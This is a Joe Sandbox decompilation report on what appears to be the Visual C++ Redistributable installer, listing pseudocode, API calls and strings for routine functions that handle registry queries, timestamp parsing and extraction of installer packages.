                                                                          						__eax = E0002BC1C(__ecx, __edx, __edi, __eflags,  *((intOrPtr*)(__ecx + 0x18)),  *((intOrPtr*)(__ecx + 0x24)) + 0xb4, __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 0xe:
                                                                          						_a8 = E0002C0B1(__ecx, __eflags,  *((intOrPtr*)(_a8 + 0x18)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 0xf:
                                                                          						_a8 = E0002B2C2(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x18)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 0x10:
                                                                          						_a8 = E0002BE05(__ecx, __eflags,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(__eax + 0x10)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
                                                                          						L21:
                                                                          						_t98 = _t92;
                                                                          						L22:
                                                                          						 *_a12 = _t98;
                                                                          						goto L24;
                                                                          				}
                                                                          			}






                                                                          APIs
                                                                          Strings
                                                                          • Failed to save state., xrefs: 0002C661
                                                                          • Unexpected elevated message sent to child process, msg: %u, xrefs: 0002C794
                                                                          • elevation.cpp, xrefs: 0002C788
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleMutexRelease
                                                                          • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                          • API String ID: 4207627910-1576875097
                                                                          • Opcode ID: 27663ff9cc8b0faf5a00da02c28ea8b8604401084af0c02864a586102b3cd703
                                                                          • Instruction ID: 031d2aa67adc2661cfb77be4643a27128c5bd924b2c4e70432c3b08a4ae40e9b
                                                                          • Opcode Fuzzy Hash: 27663ff9cc8b0faf5a00da02c28ea8b8604401084af0c02864a586102b3cd703
                                                                          • Instruction Fuzzy Hash: 3F61F53A104624FFDB229F94DD41C5ABBB2FF09314711C558FAAA5A632C732E921EF41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 91%
                                                                          			E000510C5(void* _a4, short* _a8, signed int* _a12, signed int* _a16) {
                                                                          				int* _v8;
                                                                          				int _v12;
                                                                          				int _v16;
                                                                          				signed short _t44;
                                                                          				void* _t47;
                                                                          				int* _t51;
                                                                          				long _t71;
                                                                          				signed int _t72;
                                                                          				signed int _t73;
                                                                          				signed short _t75;
                                                                          				unsigned int _t79;
                                                                          				unsigned int _t80;
                                                                          				unsigned int _t81;
                                                                          				WCHAR* _t82;
                                                                          				void* _t86;
                                                                          				void* _t87;
                                                                          				void* _t88;
                                                                          
                                                                          				_v16 = 0;
                                                                          				_t72 = 0;
                                                                          				_v12 = 0;
                                                                          				_t81 = 0;
                                                                          				_v8 = 0;
                                                                          				_t44 = RegQueryValueExW(_a4, _a8, 0,  &_v16, 0,  &_v12);
                                                                          				_t79 = _v12;
                                                                          				_t75 = _t44;
                                                                          				if(_t79 == 0) {
                                                                          					L3:
                                                                          					_t86 = 0x80070002;
                                                                          					_t47 =  <=  ? _t75 : _t75 & 0x0000ffff | 0x80070000;
                                                                          					if(_t47 != 0x80070002) {
                                                                          						if(_t75 == 0) {
                                                                          							_t80 = _t79 >> 1;
                                                                          							if(_t80 == _t81) {
                                                                          								if(_v16 == 7) {
                                                                          									if(_t81 >= 2) {
                                                                          										_t51 = _v8;
                                                                          										if(0 !=  *((intOrPtr*)(_t51 + _t81 * 2 - 2)) || 0 !=  *((intOrPtr*)(_t51 + _t81 * 2 - 4))) {
                                                                          											_t86 = 0x80070057;
                                                                          										} else {
                                                                          											_t87 = 0;
                                                                          											if(_t80 != 0) {
                                                                          												do {
                                                                          													_t87 = _t87 + 1;
                                                                          													_t29 = _t72 + 1; // 0x1
                                                                          													_t63 =  !=  ? _t72 : _t29;
                                                                          													_t72 =  !=  ? _t72 : _t29;
                                                                          												} while (_t87 < _t80);
                                                                          											}
                                                                          											_t31 = _t72 - 1; // 0x0
                                                                          											_t52 = _t31;
                                                                          											 *_a16 = _t31;
                                                                          											_t86 = E000138F6(_t31, _a16, _a12, _t52, 4, 0);
                                                                          											if(_t86 >= 0) {
                                                                          												_t73 = 0;
                                                                          												_t82 = _v8;
                                                                          												if( *_a16 > 0) {
                                                                          													while(1) {
                                                                          														_t86 = E000121A5( *_a12 + _t73 * 4, _t82, 0);
                                                                          														if(_t86 < 0) {
                                                                          															goto L23;
                                                                          														}
                                                                          														_t82 =  &(( &(_t82[lstrlenW(_t82)]))[1]);
                                                                          														_t73 = _t73 + 1;
                                                                          														if(_t73 <  *_a16) {
                                                                          															continue;
                                                                          														} else {
                                                                          														}
                                                                          														goto L23;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										 *_a12 =  *_a12 & _t72;
                                                                          										 *_a16 =  *_a16 & _t72;
                                                                          										_t86 = 0;
                                                                          									}
                                                                          								} else {
                                                                          									_t86 = 0x8007070c;
                                                                          									_push(0x8007070c);
                                                                          									_push(0x225);
                                                                          									goto L6;
                                                                          								}
                                                                          							} else {
                                                                          								_t86 = 0x8000ffff;
                                                                          							}
                                                                          						} else {
                                                                          							_t88 = _t47;
                                                                          							_t47 = 0x80004005;
                                                                          							_t86 =  >=  ? 0x80004005 : _t88;
                                                                          							_push(_t86);
                                                                          							_push(0x21a);
                                                                          							L6:
                                                                          							_push("regutil.cpp");
                                                                          							E000137D3(_t47);
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t81 = _t79 >> 1;
                                                                          					_t86 = E00011EDE( &_v8, _t81);
                                                                          					if(_t86 >= 0) {
                                                                          						_t71 = RegQueryValueExW(_a4, _a8, 0,  &_v16, _v8,  &_v12);
                                                                          						_t79 = _v12;
                                                                          						_t75 = _t71;
                                                                          						goto L3;
                                                                          					}
                                                                          				}
                                                                          				L23:
                                                                          				_t48 = _v8;
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_t48);
                                                                          				}
                                                                          				return _t86;
                                                                          			}





















                                                                          APIs
                                                                          • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000510ED
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,00026EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 00051126
                                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0005121A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$lstrlen
                                                                          • String ID: BundleUpgradeCode$regutil.cpp
                                                                          • API String ID: 3790715954-1648651458
                                                                          • Opcode ID: c9ae826c5a833f7001f2bde779b8d87995bc064dcfe256b5344366cf688e24af
                                                                          • Instruction ID: b2ec601214cd096db9a67ba6340e4362883436c2b3dc1c661b0064fb7b0cfe79
                                                                          • Opcode Fuzzy Hash: c9ae826c5a833f7001f2bde779b8d87995bc064dcfe256b5344366cf688e24af
                                                                          • Instruction Fuzzy Hash: 9B41CD31A0021AABDB258FA8C884BEFB7B9EF44712F1141A9ED15EB210D734DD158BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 90%
                                                                          			E000585CB(intOrPtr _a4, struct _FILETIME* _a8) {
                                                                          				signed int _v8;
                                                                          				struct _SYSTEMTIME _v24;
                                                                          				signed int _v28;
                                                                          				struct _FILETIME* _v32;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t21;
                                                                          				void* _t26;
                                                                          				signed short _t32;
                                                                          				signed int _t35;
                                                                          				signed short _t38;
                                                                          				void* _t40;
                                                                          				void* _t42;
                                                                          				void* _t44;
                                                                          				void* _t46;
                                                                          				signed short _t50;
                                                                          				signed short* _t54;
                                                                          				void* _t56;
                                                                          				void* _t57;
                                                                          				signed short* _t58;
                                                                          				signed int _t64;
                                                                          				void* _t65;
                                                                          
                                                                          				_t21 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t21 ^ _t64;
                                                                          				_v28 = _v28 & 0x00000000;
                                                                          				_t50 = 0;
                                                                          				_v32 = _a8;
                                                                          				_t58 =  &_v24;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t26 = E000121A5( &_v28, _a4, 0);
                                                                          				_t60 = _t26;
                                                                          				if(_t26 < 0) {
                                                                          					L23:
                                                                          					if(_v28 != 0) {
                                                                          						E000554EF(_v28);
                                                                          					}
                                                                          					return E0003DE36(_t50, _v8 ^ _t64, 0, _t58, _t60);
                                                                          				}
                                                                          				_t58 = _v28;
                                                                          				_t54 = _t58;
                                                                          				if(_t58 == 0) {
                                                                          					L21:
                                                                          					if(SystemTimeToFileTime( &_v24, _v32) == 0) {
                                                                          						_t32 = GetLastError();
                                                                          						_t63 =  <=  ? _t32 : _t32 & 0x0000ffff | 0x80070000;
                                                                          						_t60 =  >=  ? 0x80004005 :  <=  ? _t32 : _t32 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "timeutil.cpp", 0xbf,  >=  ? 0x80004005 :  <=  ? _t32 : _t32 & 0x0000ffff | 0x80070000);
                                                                          					}
                                                                          					goto L23;
                                                                          				} else {
                                                                          					goto L2;
                                                                          				}
                                                                          				while(1) {
                                                                          					L2:
                                                                          					_t35 =  *_t58 & 0x0000ffff;
                                                                          					if(_t35 == 0) {
                                                                          						goto L21;
                                                                          					}
                                                                          					_t56 = 0x54;
                                                                          					if(_t56 == _t35) {
                                                                          						L6:
                                                                          						 *_t58 = 0;
                                                                          						_t58 =  &(_t58[1]);
                                                                          						_t38 = _t50;
                                                                          						if(_t38 == 0) {
                                                                          							_v24.wYear = E00046490(_t54, _t54, 0, 0xa);
                                                                          							L18:
                                                                          							_t65 = _t65 + 0xc;
                                                                          							L19:
                                                                          							_t54 = _t58;
                                                                          							_t50 = _t50 + 1;
                                                                          							L20:
                                                                          							_t58 =  &(_t58[1]);
                                                                          							if(_t58 != 0) {
                                                                          								continue;
                                                                          							}
                                                                          							goto L21;
                                                                          						}
                                                                          						_t40 = _t38 - 1;
                                                                          						if(_t40 == 0) {
                                                                          							_v24.wMonth = E00046490(_t54, _t54, 0, 0xa);
                                                                          							goto L18;
                                                                          						}
                                                                          						_t42 = _t40 - 1;
                                                                          						if(_t42 == 0) {
                                                                          							_v24.wDay = E00046490(_t54, _t54, 0, 0xa);
                                                                          							goto L18;
                                                                          						}
                                                                          						_t44 = _t42 - 1;
                                                                          						if(_t44 == 0) {
                                                                          							_v24.wHour = E00046490(_t54, _t54, 0, 0xa);
                                                                          							goto L18;
                                                                          						}
                                                                          						_t46 = _t44 - 1;
                                                                          						if(_t46 == 0) {
                                                                          							_v24.wMinute = E00046490(_t54, _t54, 0, 0xa);
                                                                          							goto L18;
                                                                          						}
                                                                          						if(_t46 != 1) {
                                                                          							goto L19;
                                                                          						}
                                                                          						_v24.wSecond = E00046490(_t54, _t54, 0, 0xa);
                                                                          						goto L18;
                                                                          					}
                                                                          					_t57 = 0x3a;
                                                                          					if(_t57 == _t35) {
                                                                          						goto L6;
                                                                          					}
                                                                          					_push(0x2d);
                                                                          					_pop(0);
                                                                          					if(0 != _t35) {
                                                                          						goto L20;
                                                                          					}
                                                                          					goto L6;
                                                                          				}
                                                                          				goto L21;
                                                                          			}


                                                                          APIs
                                                                          • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 000586D8
                                                                          • GetLastError.KERNEL32 ref: 000586E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$ErrorFileLastSystem
                                                                          • String ID: @Met$clbcatq.dll$timeutil.cpp
                                                                          • API String ID: 2781989572-287230135
                                                                          • Opcode ID: d7daf60b14e13af00ac0cadc9304801a321fa36fa802aa568b82a8b616e1772a
                                                                          • Instruction ID: 22ce85afd53bce9837212e2561a1685b720465bb07a9ab48000b1210d3460fe2
                                                                          • Opcode Fuzzy Hash: d7daf60b14e13af00ac0cadc9304801a321fa36fa802aa568b82a8b616e1772a
                                                                          • Instruction Fuzzy Hash: 6241F8B1B4030576EB60ABB88C45BBF77A8EF81702F148529FD01B7191D935CE0883A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E0003AAE8(void* __ebx, signed int __ecx, intOrPtr _a4, intOrPtr* _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                          				signed int _v8;
                                                                          				char _v96;
                                                                          				void* __edi;
                                                                          				void* _t33;
                                                                          				void* _t48;
                                                                          				signed int _t49;
                                                                          				void* _t51;
                                                                          				intOrPtr* _t52;
                                                                          				void* _t53;
                                                                          				intOrPtr _t54;
                                                                          
                                                                          				_t49 = __ecx;
                                                                          				_t47 = __ebx;
                                                                          				E0003F670(_t51,  &_v96, 0, 0x58);
                                                                          				_t52 = _a8;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t28 =  ==  ? _t49 | 0xffffffff : _a4;
                                                                          				_t53 = E0001C129( &_v96, _t52,  ==  ? _t49 | 0xffffffff : _a4, _a12);
                                                                          				if(_t53 >= 0) {
                                                                          					_push(__ebx);
                                                                          					while(1) {
                                                                          						_t33 = E0001C108( &_v96,  &_v8);
                                                                          						if(_t33 != 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t48 = 0;
                                                                          						if(_a20 <= 0) {
                                                                          							L7:
                                                                          							_t53 = E0001C344( &_v96);
                                                                          							if(_t53 < 0) {
                                                                          								_push( *_t52);
                                                                          								_push(_v8);
                                                                          								_push("Failed to skip the extraction of payload: %ls from container: %ls");
                                                                          								L18:
                                                                          								_push(_t53);
                                                                          								E0005012F();
                                                                          								L11:
                                                                          								_pop(_t47);
                                                                          								L12:
                                                                          								if(_v8 != 0) {
                                                                          									E000554EF(_v8);
                                                                          								}
                                                                          								E0001C055(_t47,  &_v96);
                                                                          								return _t53;
                                                                          							}
                                                                          							continue;
                                                                          						}
                                                                          						_t54 = _a16;
                                                                          						while(CompareStringW(0x7f, 0, _v8, 0xffffffff,  *( *((intOrPtr*)(_t54 + 4)) + 0x38), 0xffffffff) != 2) {
                                                                          							_t48 = _t48 + 1;
                                                                          							_t54 = _t54 + 0xc;
                                                                          							if(_t48 < _a20) {
                                                                          								continue;
                                                                          							}
                                                                          							goto L7;
                                                                          						}
                                                                          						_t53 = E0001C386( &_v96,  *((intOrPtr*)(_t54 + 8)));
                                                                          						if(_t53 >= 0) {
                                                                          							continue;
                                                                          						}
                                                                          						_push( *_t52);
                                                                          						_push(_v8);
                                                                          						_push("Failed to extract payload: %ls from container: %ls");
                                                                          						goto L18;
                                                                          					}
                                                                          					_t53 =  !=  ? _t33 : 0;
                                                                          					if(_t53 < 0) {
                                                                          						E0005012F(_t53, "Failed to extract all payloads from container: %ls",  *_t52);
                                                                          					}
                                                                          					goto L11;
                                                                          				}
                                                                          				E0005012F(_t53, "Failed to open container: %ls.",  *_t52);
                                                                          				goto L12;
                                                                          			}














                                                                          Strings
                                                                          • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 0003ABEF
                                                                          • Failed to open container: %ls., xrefs: 0003AB2A
                                                                          • Failed to extract all payloads from container: %ls, xrefs: 0003AB9C
                                                                          • Failed to extract payload: %ls from container: %ls, xrefs: 0003ABE3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorFileLast
                                                                          • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                          • API String ID: 1214770103-3891707333
                                                                          • Opcode ID: db442f9de795c08840a650ddf1c2a140e52eff65dde03af9ebc00edf6c4bd6b1
                                                                          • Instruction ID: 673e7aaf15fc5536be18b8ab3d363ae2f5c8eed211e6c6ab530e4bc7486f1eda
                                                                          • Opcode Fuzzy Hash: db442f9de795c08840a650ddf1c2a140e52eff65dde03af9ebc00edf6c4bd6b1
                                                                          • Instruction Fuzzy Hash: E831F636E4061AFBCF129AE4CC42EDEB76EAF05310F100225FD11AA192E731DA55DB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00054212(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				void* _v16;
                                                                          				char _v20;
                                                                          				void* _t34;
                                                                          				void* _t37;
                                                                          				signed short* _t39;
                                                                          				signed int _t42;
                                                                          				void* _t44;
                                                                          				void* _t45;
                                                                          				signed int _t49;
                                                                          				void* _t50;
                                                                          
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_t50 = E00054315(_a4, _a8);
                                                                          				if(_t50 == 0) {
                                                                          					L21:
                                                                          					if(_v12 != 0) {
                                                                          						E00012647(_v12, _v8);
                                                                          					}
                                                                          					if(_v16 != 0) {
                                                                          						RegCloseKey(_v16);
                                                                          					}
                                                                          					return _t50;
                                                                          				}
                                                                          				_t34 = E00050E3F(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", 1,  &_v16);
                                                                          				if(_t34 == 0x80070002 || _t34 < 0) {
                                                                          					L20:
                                                                          					goto L21;
                                                                          				} else {
                                                                          					_t37 = E000510C5(_v16, L"PendingFileRenameOperations",  &_v12,  &_v8);
                                                                          					if(_t37 != 0x80070002 && _t37 >= 0) {
                                                                          						_t49 = 0;
                                                                          						if(_v8 <= 0) {
                                                                          							goto L20;
                                                                          						}
                                                                          						_a8 = 0x5c;
                                                                          						_t45 = 0x3f;
                                                                          						do {
                                                                          							_t39 =  *(_v12 + _t49 * 4);
                                                                          							if(_t39 == 0) {
                                                                          								goto L17;
                                                                          							}
                                                                          							_t42 =  *_t39 & 0x0000ffff;
                                                                          							if(_t42 == 0) {
                                                                          								goto L17;
                                                                          							}
                                                                          							if(_a8 == _t42 && _t45 == _t39[1] && _t45 == _t39[2]) {
                                                                          								_t44 = 0x5c;
                                                                          								if(_t44 == _t39[3]) {
                                                                          									_t39 =  &(_t39[4]);
                                                                          								}
                                                                          							}
                                                                          							if(E00012D05( &_v20, _a4, _t39,  &_v20) < 0) {
                                                                          								goto L20;
                                                                          							} else {
                                                                          								if(_v20 == 2) {
                                                                          									_t50 = 0;
                                                                          									goto L20;
                                                                          								}
                                                                          								_t45 = 0x3f;
                                                                          							}
                                                                          							L17:
                                                                          							_t49 = _t49 + 2;
                                                                          						} while (_t49 < _v8);
                                                                          					}
                                                                          					goto L20;
                                                                          				}
                                                                          			}
















                                                                          APIs
                                                                            • Part of subcall function 00054315: FindFirstFileW.KERNEL32(00038FFA,?,000002C0,00000000,00000000), ref: 00054350
                                                                            • Part of subcall function 00054315: FindClose.KERNEL32(00000000), ref: 0005435C
                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll), ref: 00054305
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                            • Part of subcall function 000510C5: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000510ED
                                                                            • Part of subcall function 000510C5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,00026EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 00051126
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFindQueryValue$FileFirstOpen
                                                                          • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                          • API String ID: 3397690329-3978359083
                                                                          • Opcode ID: 17fee2e058f2005369d91d56582188f87b339f63b87ebf38712cf8c13cc09815
                                                                          • Instruction ID: 275331c51fcb3fa0fe9c97e89974d2be90b1f54727ce246af3abba60e192fa06
                                                                          • Opcode Fuzzy Hash: 17fee2e058f2005369d91d56582188f87b339f63b87ebf38712cf8c13cc09815
                                                                          • Instruction Fuzzy Hash: EF319E35900229BADF21AFD1C881AFFB7B9EB0035AF94816AFD04A7151D7319AD8CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 80%
                                                                          			E0001EEF9(void* __ecx, intOrPtr _a4) {
                                                                          				void* _v8;
                                                                          				short* _v12;
                                                                          				char _v16;
                                                                          				void* _t25;
                                                                          				intOrPtr _t44;
                                                                          				void* _t45;
                                                                          				intOrPtr _t46;
                                                                          
                                                                          				_t41 = __ecx;
                                                                          				_v16 = 0;
                                                                          				_t40 = 1;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t25 = E0001E7CD(__ecx, _a4,  &_v16);
                                                                          				_t44 = _v16;
                                                                          				_t45 = _t25;
                                                                          				if(_t45 >= 0) {
                                                                          					_t46 = _a4;
                                                                          					if(E00050E3F( *((intOrPtr*)(_t46 + 0x4c)), _t44, 1,  &_v8) < 0) {
                                                                          						L7:
                                                                          						_t45 = 0;
                                                                          						if(_t40 != 0) {
                                                                          							_t45 = E00050B49(_t41,  *((intOrPtr*)(_a4 + 0x4c)), _t44, 0, 0);
                                                                          							if(_t45 != 0x80070002 && _t45 < 0) {
                                                                          								E0005012F(_t45, "Failed to remove update registration key: %ls", _t44);
                                                                          							}
                                                                          						}
                                                                          						goto L11;
                                                                          					}
                                                                          					if(E00050F6E(_v8, L"PackageVersion",  &_v12) >= 0) {
                                                                          						CompareStringW(0x7f, 0, _v12, 0xffffffff,  *(_t46 + 0x64), 0xffffffff);
                                                                          						_t41 = 0;
                                                                          						_t40 =  !=  ? 0 : 1;
                                                                          					}
                                                                          					if(_v8 != 0) {
                                                                          						RegCloseKey(_v8);
                                                                          						_v8 = _v8 & 0x00000000;
                                                                          					}
                                                                          					goto L7;
                                                                          				} else {
                                                                          					_push("Failed to format key for update registration.");
                                                                          					_push(_t45);
                                                                          					E0005012F();
                                                                          					L11:
                                                                          					if(_v12 != 0) {
                                                                          						E000554EF(_v12);
                                                                          					}
                                                                          					if(_t44 != 0) {
                                                                          						E000554EF(_t44);
                                                                          					}
                                                                          					return _t45;
                                                                          				}
                                                                          			}











                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,000204CB,00000001,00000001,00000001,000204CB,00000000), ref: 0001EF70
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,000204CB,00000001,00000001,00000001,000204CB,00000000,00000001,00000002,000204CB,00000001), ref: 0001EF87
                                                                          Strings
                                                                          • Failed to remove update registration key: %ls, xrefs: 0001EFB4
                                                                          • PackageVersion, xrefs: 0001EF51
                                                                          • Failed to format key for update registration., xrefs: 0001EF26
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCompareString
                                                                          • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                          • API String ID: 446873843-3222553582
                                                                          • Opcode ID: bf4c881f876450f078beb82fe854a1452e5bf8b839e09b2677275e58d198383d
                                                                          • Instruction ID: 9a6d13ad927e8acb9cbdb68c25799c0e2112a14ffca3f3051d57cf6398502557
                                                                          • Opcode Fuzzy Hash: bf4c881f876450f078beb82fe854a1452e5bf8b839e09b2677275e58d198383d
                                                                          • Instruction Fuzzy Hash: 4621E136A04658BBDB21AAA5CC46EDFBBB9EF00712F204179FD04A7191D7319E85C690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 65%
                                                                          			E0001EE0F(intOrPtr _a4, void* _a8) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				intOrPtr* _v20;
                                                                          				char _t28;
                                                                          				intOrPtr* _t43;
                                                                          				char _t49;
                                                                          				char _t50;
                                                                          
                                                                          				_t43 = _a8;
                                                                          				_t50 = 0;
                                                                          				_v16 = 0;
                                                                          				_t49 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				if( *((intOrPtr*)(_t43 + 4)) <= 0) {
                                                                          					L17:
                                                                          					return _t50;
                                                                          				}
                                                                          				_t28 = 0;
                                                                          				_a8 = 0;
                                                                          				while(1) {
                                                                          					_t45 =  *_t43 + _t28;
                                                                          					_v20 =  *_t43 + _t28;
                                                                          					_t50 = E000171CF(_a4,  *((intOrPtr*)(_t45 + 8)),  &_v16, 0);
                                                                          					if(_t50 < 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t50 = E00012D79(_t45, _v16, L"swidtag",  &_v8);
                                                                          					if(_t50 < 0) {
                                                                          						_push("Failed to allocate regid folder path.");
                                                                          						L10:
                                                                          						_push(_t50);
                                                                          						E0005012F();
                                                                          						L11:
                                                                          						if(_v12 != 0) {
                                                                          							E000554EF(_v12);
                                                                          						}
                                                                          						if(_v8 != 0) {
                                                                          							E000554EF(_v8);
                                                                          						}
                                                                          						if(_v16 != 0) {
                                                                          							E000554EF(_v16);
                                                                          						}
                                                                          						goto L17;
                                                                          					}
                                                                          					_t50 = E00012D79(_t45, _v8,  *_v20,  &_v12);
                                                                          					_t54 = _t50;
                                                                          					if(_t50 < 0) {
                                                                          						_push("Failed to allocate regid file path.");
                                                                          						goto L10;
                                                                          					}
                                                                          					E00054038(_t45, _t54, _v12);
                                                                          					_push(0);
